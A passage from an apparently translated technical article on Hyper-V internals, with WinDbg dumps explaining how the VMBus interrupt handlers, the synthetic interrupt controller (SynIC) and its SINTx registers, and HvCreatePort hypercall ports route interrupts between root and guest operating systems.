<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553f8 fffff800`1b377b60 nt!KiVmbusInterrupt2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b955400 00000000`00000034</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b955408 fffff800`1b377eb0 nt!KiVmbusInterrupt3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Accordingly, handlers traps 0x30-0x34 IDT after the initialization would look similar to the following:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">30:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377160 nt!KiHvInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">31:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b3774c0 nt!KiVmbusInterrupt0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">32:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377810 nt!KiVmbusInterrupt1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">33:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377b60 nt!KiVmbusInterrupt2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">34:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377eb0 nt!KiVmbusInterrupt3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">What's interesting, the second generation of the virtual machine can be only created on the basis of operating systems when the kernel containing these 5 additional handlers. In order to generate interrupts Intel has a hardware feature "virtual interrupt delivery", but Hyper-V does not use the opportunity to transfer control to these handlers. Instead, the hypervisor activates bit corresponding to the number of the vector in the special memory area by using instructions locks bts [rcx + 598h], rax, where in rax - interrupt vector number (0x30-0x32), so perhaps developers of Hyper-V considered an option with the registration procedure vmbus!XPartPncIsr handler as less productive solution than the option of the interrupt generation by the APIC virtualization from the data in the virtual registers SINTx. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These handlers are registered with IDT, even when the operating system runs out of the Hyper-V environment. Each handler calls HvlRouteInterrupt, passing the</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">index as a parameter.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="106" src="https://lh3.googleusercontent.com/5f8QZea9j86y0W18QxhyPlW5j1IajYFmkWvVoMJXtI8niIgsoUvTNH5BS0TcNLCzYGtkAavBxH8ZWJ1W-Mq_QC_iYHzFuFmO-7VSYQSyrjwC3NXJ3pSUA9qx4I-s8M3o4Hi8OcNCWNX4hWin" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="192" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlRouteInterrupt:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><img height="171" src="https://lh5.googleusercontent.com/z6zL8RcHPL5dIV9JND9pzhWmlviOSfLGrnt5hPGjVoEjefmy74igb6IKo2REzOSt4rO5ah_nVj4_ujT-ALcAItrL5nKe8U05O1eBKYIdRy1vCMzeHdcMRO67DDQBalMJ3olGuxsPW4lJQZKJ" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="200" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This function calls a handler from an array of pointers HvlpInterruptCallback depending of value of the index. An array in the root OS looks as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">5: kd> dps HvlpInterruptCallback </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc30 fffff800`dc639d50 winhvr!WinHvOnInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc38 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc40 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc48 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc50 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc58 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPartEnlightenedIsr on index, passed from KiVmbusInterruptX, adds to the DPC queue of one of two possible functions from the array of DPC structures in vmbusr: vmbusr! ParentInterruptDpc or vmbusr! ParentRingInterruptDpc:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="350" src="https://lh4.googleusercontent.com/YkoipD3NQOtFXoFKSVkEhJXIcUfi8HoSSyfrSdNOks3Q958FXBLlEwOBqXkwx8eCloTyMWM8VKgv1jB2SleW1HXA2VUHS4jfVPqBKi2DN2wjgch7QdCHVkQFCYEt8rjBS2geyTFAlYQ3lUOh" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="437" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img alt="D:\Документы\Explore\Virtualization\Hyper-V\4ERNW\fromERNW\1.png" height="494" src="https://lh3.googleusercontent.com/JwttcDxcrQdjKTOW1zvGXyZ6-2BGcAnRvj621m0wE0laYi4Ji6MNq0toNAMfkVe1HUBB8rDyMHtsHdcbvDKHFZT_ooIJEmvXRU_KmsEG5tMyTwSqm2Y2hrH0wqjjbZDiIe4qar7ntVoiZMWx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="595" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The number of 2 elements DPC structures (one for nt!KiVmbusInterrupt0, second – nt!KiVmbusInterrupt1) in the array is determined by the function vmbusr!XPartPncPostInterruptsEnabledParent and depends on the number of logical processors in the root OS. DPC is added for each logical processor with deferred routines vmbusr!ParentInterruptDpc and vmbusr!ParentRingInterruptDpc. Function vmbusr!ParentRingInterruptDpc defines the address of KDPC-stucture for the nt!KeInsertQueueDpc based on the fact on which the processor is currently executing. </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a Windows guest OS, vmbus registers in the array HvlpInterruptCallback only one handler:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1: kd> dps HvlpInterruptCallback </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`1d171c30 fffff800`6d7c5714 winhv!WinHvOnInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`1d171c38 fffff800`6d801360 vmbus!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`1d171c40 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Array HvlpInterruptCallback is filled by function nt!HvlRegisterInterruptCallback. Handler WinHvOnInterrupt is registered during loading winhvr.sys (winhvr! WinHvpInitialize-> winhvr! WinHvReportPresentHypervisor-> winhvr! WinHvpConnectToHypervisor-> nt! HvlRegisterInterruptCallback).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The rest of the 4 handler registered by vmbusr.sys when it loads by PnPManager (vmbusr! RootDevicePrepareHardwareParent-> nt! HvlRegisterInterruptCallback).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's try to understand how the hypervisor passes the control to the system interrupt handlers which were described above. To do this, you must refer to the Virtual Interrupt Control TLFS. In short, the Hyper-V manages interrupt in the guest OS through a synthetic interrupt controller (SynIC), which is an extension of the local APIC and uses an extra set of registers displayed in the memory (memory mapped registers). Each virtual processor in addition to the usual APIC has additional SynIC. SynIC contains 2 pages: SIM (synthetic interrupt message) and SIEF(synthetic interrupt event flags), SIEF and SIM are arrays of 16 elements, the element size - 256 bytes. The physical address (to be more precise, the Guest Physical Address) of these arrays are located in the MSR-registers SIEF and SIMP respectively. The addresses of these pages for each logical CPU would be different. Also for SynIC defined 16 SINTx-registers. Each of the array elements in SIM and SIEF compared with the corresponding register SINTx. WinDBG shows the contents of the SINTx registers using the !apic command (since WinDBG 6.3).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root ОS:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="260" src="https://lh6.googleusercontent.com/MXkRBvZjILSVHSpsGgrEZpNNLIIXooDK1Xfp7TPf2YJ2zofHK3OBV7GNmJf1FbJuFXFeLuXlY3Qxvm5PXW__vNn09T4_kgrV2egWxfoW0D0M303NYYlQl-TRSnSovF5iiMQxsE8nQL8rz3-j" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="374" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guest OS:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="207" src="https://lh6.googleusercontent.com/Em1kwQJL0uQic4b6OAuH8GI7wKYZ-xweE-GybYYoPBT3bGqpKRPvfKI-t1dPZm8KIDV3gvCwZYkU-pvuLQL9aehjwiESF8XJRuonnvmDIlRzm_cYEV-GLpxlNAPDEyIC-4OsfSHXmEKHQDgv" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="356" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Configuration of registers SINT0 and SINT1 are performed by the function nt!HvlEnlightenProcessor by recording the parameters in MSR 40000090h and 40000091h respectively. SINT4 and SINT5 are configured in vmbusr.sys: vmbusr!XPartPncPostInterruptsEnabledParent-> winhvr!WinHvSetSint-> winhvr!WinHvSetSintOnCurrentProcessor. SINT2 in the guest operating system is configured in vmbus.sys which called winhv!WinHvSetSintOnCurrentProcessor.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each SINTx present 8-bit field Vector which impact on the interrupt routine will be given control when the hypercall is executed with the parameters set by PortID (HvSignalEvent, HvPostMessage).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SINTx can be specified explicitly (for example, message interception will always be controlled by SINT0 and placed in the first element of the page SIM), clearly (for timer message) or configured for a port that was created with the HvCreatePort hypercall, which has parameter PortTypeInfo. If the port type is HvPortTypeMessage or HvPortTypeEvent, the PortTypeInfo parameter is TargetSint, which contains SINT number that you want to bind the port to and the value can be from 1 to 15 (SINT0 is reserved for messages from the hypervisor and cannot be specified as a TargetSint, when you create a port). </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Analyze of non-zeroed SINT values in root OS show that there are 3 (from 5) interrupt routine was used (KiHvInterrupt, KiVmbusInterrupt0, KiVmbusInterrupt1). Maybe KiVmbusInterrupt2 and KiVmbusInterrupt3 need to run the servers with a large number of logical processors (eg, 64), but, unfortunately, in a test environment, this version could not be verified. Also, in the values of the SINTx registers can be seen that the handler nt!KiHvInterrupt (vector 30) will be called as when generating an interrupt from the hypervisor and ports by the parameter when TargetSint is equal to 1.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For example, consider the parameters of the ports that are created when you activate each of the services from the guest Hyper-V integration components.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the following table are sample values of some parameters of the hypervisor HvCreatePort:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="144" src="https://lh6.googleusercontent.com/6wxWUdzDtFr8DL3jZti85-cz9e7Fbvx5Y79DbbkT1LOt5CR1bPFHUSE3X6wBokT-HbGgMURSxdMle_HgQznjUy7Vc8zPbtGU6BeU4MYaAJ1tkZqYZt1sYyY5NaW43B-o3AAFaTRMO2xAaq1I" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="519" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root OS and guest OS interaction during work Integration Services occurs through the 5-th element of the array SIEF, I.e. the handler in root OS will call KiVmbusInterrupt1.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The number of each port should be created equal to the previous and increased by 1. That is, If you disable all services integration and then re-enable them, the port numbers that are created for these services will be in the range from 0x22 to 0x27 (the configuration is shown in Figure 11, in other cases, the port number are of course different).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can see the port settings if you connect directly to the hypervisor debugger and trace the passed data to the handler of the hypervisor HvCreatePort or connect the kernel debugger and trace the parameters WinHvCreatePort in the driver winhvr.sys.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The other ports are created when you power on guest OS (number of ports depends on the configuration of the guest operating system). The numbering is given by the order they are created if you enabled the virtual machine port in Windows Server 2012 R2 hardware by default.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="238" src="https://lh3.googleusercontent.com/tYUNkpt5i7vriNXUNAT-jmPh2ocz535y_BCWD6GMog2VV6kG8GHQ4xGWQp-KmDsz_itMOp1uU0DVLpq9PxDY_lXNkXb-g7YtqBMAQ2Ueh29yIvi5wXlcV5_MDNCGGx6jAeIWwrBA7ThxK-Gy" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="276" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is important to note the fact that the SIM0 slot in the guest and the parent OS is reserved for transmitting messages from the hypervisor. The format of these messages is documented in TLFS. When data is transferred over the remaining slots it will uses a different data format message. Vmbus messages is not documented, but the necessary information to work with them is present in LIS source codes.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Some information about the vmbus messages processing by vmbusr.sys:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="371" src="https://lh5.googleusercontent.com/UenI50omJVgFPcVmV1LKTS_KyJ4qn0lv-1QRlmaQy4QG_n49B7uxIv9xw3hiLSS8rRR-9MQ7HG0LttJN9QrVtz1fpOLEI5LPrne9PD_YFQLyC5NVcq-0Lw87Hsl0q1iZAcxJH5Ofcr4YgxbY" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="517" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
